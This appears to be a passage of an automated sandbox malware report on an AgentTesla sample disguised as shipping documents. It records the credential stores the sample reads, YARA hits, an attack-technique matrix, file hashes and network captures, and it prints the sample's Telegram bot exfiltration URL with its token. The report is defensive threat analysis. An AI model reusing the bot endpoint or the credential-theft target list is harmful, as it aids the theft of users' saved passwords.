              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe | File opened: C:\Users\user\AppData\Roaming\Thunderbird\profiles.ini
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe | Key opened: HKEY_CURRENT_USER\Software\IncrediMail\Identities
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe | Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe | Key opened: HKEY_CURRENT_USER\SOFTWARE\Martin Prikryl\WinSCP 2\Sessions
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe | File opened: C:\Users\user\AppData\Roaming\FileZilla\recentservers.xml
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe | File opened: C:\Users\user\AppData\Roaming\SmartFTP\Client 2.0\Favorites\Quick Connect\
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe | File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\profiles.ini
              Source: Yara match | File source: 00000001.00000002.819488007.0000000003151000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
              Source: Yara match | File source: Process Memory Space: CasPol.exe PID: 5312, type: MEMORYSTR

              Remote Access Functionality

              Source: Yara match | File source: 00000001.00000002.819488007.0000000003151000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
              Source: Yara match | File source: Process Memory Space: CasPol.exe PID: 5312, type: MEMORYSTR
              Source: Yara match | File source: 1.0.CasPol.exe.400000.0.unpack, type: UNPACKEDPE
              Source: Yara match | File source: 00000001.00000000.397838302.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
              Source: Yara match | File source: 00000001.00000002.819488007.0000000003151000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
              Source: Yara match | File source: Process Memory Space: CasPol.exe PID: 5312, type: MEMORYSTR
              Initial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionExfiltrationCommand and ControlNetwork EffectsRemote Service EffectsImpact
              Valid Accounts211
              Windows Management Instrumentation
              2
              LSASS Driver
              2
              LSASS Driver
              1
              Disable or Modify Tools
              2
              OS Credential Dumping
              114
              System Information Discovery
              Remote Services11
              Archive Collected Data
              Exfiltration Over Other Network Medium1
              Web Service
              Eavesdrop on Insecure Network CommunicationRemotely Track Device Without AuthorizationModify System Partition
              Default Accounts1
              Native API
              2
              Windows Service
              2
              Windows Service
              1
              Deobfuscate/Decode Files or Information
              1
              Credentials in Registry
              111
              Security Software Discovery
              Remote Desktop Protocol2
              Data from Local System
              Exfiltration Over Bluetooth11
              Encrypted Channel
              Exploit SS7 to Redirect Phone Calls/SMSRemotely Wipe Data Without AuthorizationDevice Lockout
              Domain AccountsAt (Linux)Logon Script (Windows)211
              Process Injection
              2
              Obfuscated Files or Information
              Security Account Manager1
              Process Discovery
              SMB/Windows Admin Shares1
              Email Collection
              Automated Exfiltration2
              Non-Application Layer Protocol
              Exploit SS7 to Track Device LocationObtain Device Cloud BackupsDelete Device Data
              Local AccountsAt (Windows)Logon Script (Mac)Logon Script (Mac)3
              Software Packing
              NTDS131
              Virtualization/Sandbox Evasion
              Distributed Component Object ModelInput CaptureScheduled Transfer3
              Application Layer Protocol
              SIM Card SwapCarrier Billing Fraud
              Cloud AccountsCronNetwork Logon ScriptNetwork Logon Script1
              Masquerading
              LSA Secrets1
              Application Window Discovery
              SSHKeyloggingData Transfer Size LimitsFallback ChannelsManipulate Device CommunicationManipulate App Store Rankings or Ratings
              Replication Through Removable MediaLaunchdRc.commonRc.common131
              Virtualization/Sandbox Evasion
              Cached Domain Credentials1
              Remote System Discovery
              VNCGUI Input CaptureExfiltration Over C2 ChannelMultiband CommunicationJamming or Denial of ServiceAbuse Accessibility Features
              External Remote ServicesScheduled TaskStartup ItemsStartup Items211
              Process Injection
              DCSyncNetwork SniffingWindows Remote ManagementWeb Portal CaptureExfiltration Over Alternative ProtocolCommonly Used PortRogue Wi-Fi Access PointsData Encrypted for Impact

              Source | Detection | Scanner | Label | Link
              BL-SHIPPING DOCUMENTS.exe | 22% | ReversingLabs | Win64.Trojan.AgentTesla |
              BL-SHIPPING DOCUMENTS.exe | 27% | Virustotal | | Browse
              BL-SHIPPING DOCUMENTS.exe | 100% | Joe Sandbox ML | |
              Source | Detection | Scanner | Label | Link
              C:\Users\user\AppData\Local\Temp\?????.sys | 1% | Virustotal | | Browse
              C:\Users\user\AppData\Local\Temp\?????.sys | 0% | ReversingLabs | |
              Source | Detection | Scanner | Label | Link | Download
              1.0.CasPol.exe.400000.0.unpack | 100% | Avira | TR/Spy.Gen8 | | Download File
              No Antivirus matches
              Source | Detection | Scanner | Label | Link
              https://api.telegram.org4 | 0% | URL Reputation | safe |
              https://www.sysinternals.com0 | 0% | URL Reputation | safe |
              https://www.theonionrouter.com/dist.torproject.org/torbrowser/9.5.3/tor-win32-0.4.3.6.ziphttps://www | 0% | URL Reputation | safe |
              http://DynDns.comDynDNSnamejidpasswordPsi/Psi | 0% | URL Reputation | safe |
              http://127.0.0.1:HTTP/1.1 | 0% | Avira URL Cloud | safe |
              https://FZsMKmQQms.net | 0% | Avira URL Cloud | safe |
              http://TcwLAp.com | 0% | Avira URL Cloud | safe |
                            Name | IP | Active | Malicious | Antivirus Detection | Reputation
                            api.telegram.org | 149.154.167.220 | true | false | | high
                            Name | Malicious | Antivirus Detection | Reputation
                            https://api.telegram.org/bot5515611206:AAEcQSX8hXHOAxSYr8KUdLxGF5eqw4FRXoA/sendDocument | false | | high
                            Name | Source | Malicious | Antivirus Detection | Reputation
                            http://TcwLAp.com | CasPol.exe, 00000001.00000002.819488007.0000000003151000.00000004.00000800.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
                            http://127.0.0.1:HTTP/1.1 | CasPol.exe, 00000001.00000002.819488007.0000000003151000.00000004.00000800.00020000.00000000.sdmp | false | Avira URL Cloud: safe | low
                            https://api.telegram.org/bot5515611206:AAEcQSX8hXHOAxSYr8KUdLxGF5eqw4FRXoA/1504449137%discordapi%yyy | CasPol.exe, 00000001.00000002.819488007.0000000003151000.00000004.00000800.00020000.00000000.sdmp | false | | high
                            https://api.telegram.org4 | CasPol.exe, 00000001.00000002.824079455.00000000034C3000.00000004.00000800.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
                            https://api.telegram.org | CasPol.exe, 00000001.00000002.824079455.00000000034C3000.00000004.00000800.00020000.00000000.sdmp | false | | high
                            https://api.telegram.org/bot5515611206:AAEcQSX8hXHOAxSYr8KUdLxGF5eqw4FRXoA/ | CasPol.exe, 00000001.00000002.819488007.0000000003151000.00000004.00000800.00020000.00000000.sdmp | false | | high
                            https://www.sysinternals.com0 | ?????.sys.0.dr | false | URL Reputation: safe | unknown
                            https://www.theonionrouter.com/dist.torproject.org/torbrowser/9.5.3/tor-win32-0.4.3.6.ziphttps://www | CasPol.exe, 00000001.00000002.819488007.0000000003151000.00000004.00000800.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
                            http://DynDns.comDynDNSnamejidpasswordPsi/Psi | CasPol.exe, 00000001.00000002.819488007.0000000003151000.00000004.00000800.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
                            http://api.telegram.org | CasPol.exe, 00000001.00000002.824168793.00000000034D8000.00000004.00000800.00020000.00000000.sdmp | false | | high
                            http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name | CasPol.exe, 00000001.00000002.824079455.00000000034C3000.00000004.00000800.00020000.00000000.sdmp | false | | high
                            https://FZsMKmQQms.net | CasPol.exe, 00000001.00000002.819488007.0000000003151000.00000004.00000800.00020000.00000000.sdmp, CasPol.exe, 00000001.00000002.824168793.00000000034D8000.00000004.00000800.00020000.00000000.sdmp, CasPol.exe, 00000001.00000002.823692783.0000000003476000.00000004.00000800.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
                            IP | Domain | Country | Flag | ASN | ASN Name | Malicious
                            149.154.167.220 | api.telegram.org | United Kingdom | | 62041 | TELEGRAMRU | false
                            Joe Sandbox Version:36.0.0 Rainbow Opal
                            Analysis ID:756203
                            Start date and time:2022-11-29 19:59:06 +01:00
                            Joe Sandbox Product:CloudBasic
                            Overall analysis duration:0h 8m 21s
                            Hypervisor based Inspection enabled:false
                            Report type:light
                            Sample file name:BL-SHIPPING DOCUMENTS.exe
                            Cookbook file name:default.jbs
                            Analysis system description:Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 104, IE 11, Adobe Reader DC 19, Java 8 Update 211
                            Number of analysed new started processes analysed:5
                            Number of new started drivers analysed:0
                            Number of existing processes analysed:0
                            Number of existing drivers analysed:0
                            Number of injected processes analysed:0
                            Technologies:
                            • HCA enabled
                            • EGA enabled
                            • HDC enabled
                            • AMSI enabled
                            Analysis Mode:default
                            Analysis stop reason:Timeout
                            Detection:MAL
                            Classification:mal100.troj.spyw.evad.winEXE@3/2@1/1
                            EGA Information:
                            • Successful, ratio: 100%
                            HDC Information:Failed
                            HCA Information:
                            • Successful, ratio: 100%
                            • Number of executed functions: 0
                            • Number of non-executed functions: 0
                            Cookbook Comments:
                            • Found application associated with file extension: .exe
                            • Override analysis time to 240s for sample files taking high CPU consumption
                            • Exclude process from analysis (whitelisted): MpCmdRun.exe, WMIADAP.exe, conhost.exe
                            • Excluded domains from analysis (whitelisted): client.wns.windows.com, ctldl.windowsupdate.com
                            • Not all processes were analyzed, report is missing behavior information
                            • Report size getting too big, too many NtAllocateVirtualMemory calls found.
                            • Report size getting too big, too many NtOpenKeyEx calls found.
                            • Report size getting too big, too many NtProtectVirtualMemory calls found.
                            • Report size getting too big, too many NtQueryValueKey calls found.
                            Time | Type | Description
                            20:01:10 | API Interceptor | 1280x Sleep call for process: CasPol.exe modified
                            Process:C:\Users\user\Desktop\BL-SHIPPING DOCUMENTS.exe
                            File Type:CSV text
                            Category:dropped
                            Size (bytes):654
                            Entropy (8bit):5.374391981354885
                            Encrypted:false
                            SSDEEP:12:Q3La/KDLI4MWuPTxAIOKbbDLI4MWuPOKN08JOKhap+92n4MNQpN9tv:ML9E4KrgKDE4KGKN08AKh6+84xpNT
                            MD5:C8A62E39DE7A3F805D39384E8BABB1E0
                            SHA1:B32B1257401F17A2D1D5D3CC1D8C1E072E3FEE31
                            SHA-256:A7BC127854C5327ABD50C86000BF10586B556A5E085BB23523B07A15DD4C5383
                            SHA-512:7DB2825131F5CDA6AF33A179D9F7CD0A206FF34AE50D6E66DE9E99BE2CD1CB985B88C00F0EDE72BBC4467E7E42B5DC6132403AA2EC1A0A7A6D11766C438B10C3
                            Malicious:true
                            Reputation:moderate, very likely benign file
                            Preview:1,"fusion","GAC",0..1,"WinRT","NotApp",1..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System\10a17139182a9efd561f01fada9688a5\System.ni.dll",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Core\4e05e2e48b8a6dd267a8c9e25ef129a7\System.Core.ni.dll",0..3,"Microsoft.VisualBasic, Version=10.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.V9921e851#\f2e0589ed6d670f264a5f65dd0ad000f\Microsoft.VisualBasic.ni.dll",0..
                            Process:C:\Users\user\Desktop\BL-SHIPPING DOCUMENTS.exe
                            File Type:PE32+ executable (DLL) (native) x86-64, for MS Windows
                            Category:dropped
                            Size (bytes):36208
                            Entropy (8bit):6.284053631838433
                            Encrypted:false
                            SSDEEP:768:tKCM0IWRhm8LiES4cT4iZ923OMqUD6Q4KICJw4:t7/Vhzb3pL4GJw4
                            MD5:97E3A44EC4AE58C8CC38EEFC613E950E
                            SHA1:BC47E15537FA7C32DFEFD23168D7E1741F8477ED
                            SHA-256:440883CD9D6A76DB5E53517D0EC7FE13D5A50D2F6A7F91ECFC863BC3490E4F5C
                            SHA-512:8EF7FC489B6FFED9EC14746E526AE87F44C39D5EAFFF0D4C3BFA0B3F0D28450F76D1066F446C766F4C9A20842A7F084FE4A9F94659D5487EA88959FCCB2A96EB
                            Malicious:true
                            Antivirus:
                            • Antivirus: Virustotal, Detection: 1%, Browse
                            • Antivirus: ReversingLabs, Detection: 0%
                            Reputation:moderate, very likely benign file
                            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......3...w.{.w.{.w.{.~...p.{.w.z.H.{.~...t.{.~...t.{.~...t.{."...v.{."..v.{.".y.v.{.Richw.{.........PE..d...l..a.........." .....L..........X.......................................................................................................x...(............`.......l..p!......0....I..T............................................@...............................text....%.......&.................. ..h.rdata.......@.......*..............@..H.data...,....P.......:..............@....pdata.......`.......<..............@..HPAGE.........p.......@.............. ..`INIT.................\.............. ..b.rsrc................f..............@..B.reloc..0............j..............@..B................................................................................................................................................................................................
                            File type:PE32+ executable (GUI) x86-64 Mono/.Net assembly, for MS Windows
                            Entropy (8bit):7.995705127935573
                            TrID:
                            • Win64 Executable GUI (202006/5) 92.65%
                            • Win64 Executable (generic) (12005/4) 5.51%
                            • Generic Win/DOS Executable (2004/3) 0.92%
                            • DOS Executable Generic (2002/1) 0.92%
                            • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                            File name:BL-SHIPPING DOCUMENTS.exe
                            File size:489472
                            MD5:69fe54a9cafee09f25e0d3f7a51488c7
                            SHA1:747373a2640c7fca04258681c7ec313be3b0db24
                            SHA256:dc72c7525da8aa1afaadaf707499054dd9be20d0c78318d2f63af1fa37d58546
                            SHA512:4230111e1b90da8e5d628bcfd16f9381cb24e9c0e31d3772798ea5bf78c711bc2634bf0343f323d094f23f587b6be5fd41f7828323d09f8a3ce0506c65a50706
                            SSDEEP:12288:0ZYJmqS//u3ML7l++F7oNt6YkIwaD2YSHTK:0Sg43ML7cEs8VaYTK
                            TLSH:32A423115AAE8580D1E98731D0A2663C41F5D323D8CBFB9973C8A36DB441A3FC7D52A9
                            File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..d...&$.c.........."...0..o............... ....@...... ....................................`................................
                            Icon Hash:00828e8e8686b000
                            Entrypoint:0x400000
                            Entrypoint Section:
                            Digitally signed:false
                            Imagebase:0x400000
                            Subsystem:windows gui
                            Image File Characteristics:EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE
                            DLL Characteristics:HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                            Time Stamp:0x63852426 [Mon Nov 28 21:12:06 2022 UTC]
                            TLS Callbacks:
                            CLR (.Net) Version:
                            OS Version Major:4
                            OS Version Minor:0
                            File Version Major:4
                            File Version Minor:0
                            Subsystem Version Major:4
                            Subsystem Version Minor:0
                            Import Hash:
                            Instruction
                            dec ebp
                            pop edx
                            nop
                            add byte ptr [ebx], al
                            add byte ptr [eax], al
                            add byte ptr [eax+eax], al
                            add byte ptr [eax], al
                            NameVirtual AddressVirtual Size Is in Section
                            IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                            IMAGE_DIRECTORY_ENTRY_IMPORT0x00x0
                            IMAGE_DIRECTORY_ENTRY_RESOURCE0x7a0000x4c6.rsrc
                            IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                            IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                            IMAGE_DIRECTORY_ENTRY_BASERELOC0x00x0
                            IMAGE_DIRECTORY_ENTRY_DEBUG0x78f780x1c.text
                            IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                            IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                            IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                            IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
                            IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                            IMAGE_DIRECTORY_ENTRY_IAT0x00x0
                            IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                            IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x20000x48.text
                            IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0
                            NameVirtual AddressVirtual SizeRaw SizeXored PEZLIB ComplexityFile TypeEntropyCharacteristics
                            .text0x20000x76fe70x77000False0.9969061843487395data7.998151218559443IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                            .rsrc0x7a0000x4c60x600False0.373046875data3.6932619079957036IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                            Name         RVA      Size   Type                                                                               Language  Country
                            RT_VERSION   0x7a0a0  0x23c  data
                            RT_MANIFEST  0x7a2dc  0x1ea  XML 1.0 document, Unicode text, UTF-8 (with BOM) text, with CRLF line terminators
                            Timestamp                 Protocol  SID      Message                                  Source Port  Dest Port  Source IP    Dest IP
                            11/29/22-20:01:10.306536  TCP       2851779  ETPRO TROJAN Agent Tesla Telegram Exfil  49705        443        192.168.2.5  149.154.167.220
                            Timestamp                            Source Port  Dest Port  Source IP        Dest IP
                            Nov 29, 2022 20:01:09.829746008 CET  49705        443        192.168.2.5      149.154.167.220
                            Nov 29, 2022 20:01:09.829794884 CET  443          49705      149.154.167.220  192.168.2.5
                            Nov 29, 2022 20:01:09.829884052 CET  49705        443        192.168.2.5      149.154.167.220
                            Nov 29, 2022 20:01:09.872064114 CET  49705        443        192.168.2.5      149.154.167.220
                            Nov 29, 2022 20:01:09.872085094 CET  443          49705      149.154.167.220  192.168.2.5
                            Nov 29, 2022 20:01:09.951184034 CET  443          49705      149.154.167.220  192.168.2.5
                            Nov 29, 2022 20:01:09.951687098 CET  49705        443        192.168.2.5      149.154.167.220
                            Nov 29, 2022 20:01:09.954327106 CET  49705        443        192.168.2.5      149.154.167.220
                            Nov 29, 2022 20:01:09.954346895 CET  443          49705      149.154.167.220  192.168.2.5
                            Nov 29, 2022 20:01:09.954652071 CET  443          49705      149.154.167.220  192.168.2.5
                            Nov 29, 2022 20:01:10.128216028 CET  49705        443        192.168.2.5      149.154.167.220
                            Nov 29, 2022 20:01:10.269850016 CET  49705        443        192.168.2.5      149.154.167.220
                            Nov 29, 2022 20:01:10.269910097 CET  443          49705      149.154.167.220  192.168.2.5
                            Nov 29, 2022 20:01:10.299458027 CET  443          49705      149.154.167.220  192.168.2.5
                            Nov 29, 2022 20:01:10.306413889 CET  49705        443        192.168.2.5      149.154.167.220
                            Nov 29, 2022 20:01:10.306437016 CET  443          49705      149.154.167.220  192.168.2.5
                            Nov 29, 2022 20:01:10.392920017 CET  443          49705      149.154.167.220  192.168.2.5
                            Nov 29, 2022 20:01:10.393022060 CET  443          49705      149.154.167.220  192.168.2.5
                            Nov 29, 2022 20:01:10.393160105 CET  49705        443        192.168.2.5      149.154.167.220
                            Nov 29, 2022 20:01:10.394990921 CET  49705        443        192.168.2.5      149.154.167.220
                            Timestamp                            Source Port  Dest Port  Source IP    Dest IP
                            Nov 29, 2022 20:01:09.783638000 CET  49724        53         192.168.2.5  8.8.8.8
                            Nov 29, 2022 20:01:09.800700903 CET  53           49724      8.8.8.8      192.168.2.5
                            Timestamp                            Source IP    Dest IP  Trans ID  OP Code             Name              Type            Class        DNS over HTTPS
                            Nov 29, 2022 20:01:09.783638000 CET  192.168.2.5  8.8.8.8  0xe01     Standard query (0)  api.telegram.org  A (IP address)  IN (0x0001)  false
                            Timestamp                            Source IP  Dest IP      Trans ID  Reply Code    Name              CName  Address          Type            Class        DNS over HTTPS
                            Nov 29, 2022 20:01:09.800700903 CET  8.8.8.8    192.168.2.5  0xe01     No error (0)  api.telegram.org         149.154.167.220  A (IP address)  IN (0x0001)  false
                            • api.telegram.org

                            Target ID:0
                            Start time:20:00:00
                            Start date:29/11/2022
                            Path:C:\Users\user\Desktop\BL-SHIPPING DOCUMENTS.exe
                            Wow64 process (32bit):false
                            Commandline:C:\Users\user\Desktop\BL-SHIPPING DOCUMENTS.exe
                            Imagebase:0x249f7060000
                            File size:489472 bytes
                            MD5 hash:69FE54A9CAFEE09F25E0D3F7A51488C7
                            Has elevated privileges:true
                            Has administrator privileges:true
                            Programmed in:.Net C# or VB.NET
                            Reputation:low

                            Target ID:1
                            Start time:20:00:48
                            Start date:29/11/2022
                            Path:C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe
                            Wow64 process (32bit):true
                            Commandline:C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe
                            Imagebase:0xa90000
                            File size:107624 bytes
                            MD5 hash:F866FC1C2E928779C7119353C3091F0C
                            Has elevated privileges:true
                            Has administrator privileges:true
                            Programmed in:.Net C# or VB.NET
                            Yara matches:
                            • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000001.00000000.397838302.0000000000402000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                            • Rule: JoeSecurity_AgentTesla_2, Description: Yara detected AgentTesla, Source: 00000001.00000000.397838302.0000000000402000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                            • Rule: Windows_Trojan_AgentTesla_d3ac2b2f, Description: unknown, Source: 00000001.00000000.397838302.0000000000402000.00000040.00000400.00020000.00000000.sdmp, Author: unknown
                            • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000001.00000002.819488007.0000000003151000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                            • Rule: JoeSecurity_TelegramRAT, Description: Yara detected Telegram RAT, Source: 00000001.00000002.819488007.0000000003151000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                            • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000001.00000002.819488007.0000000003151000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                            Reputation:moderate

                            No disassembly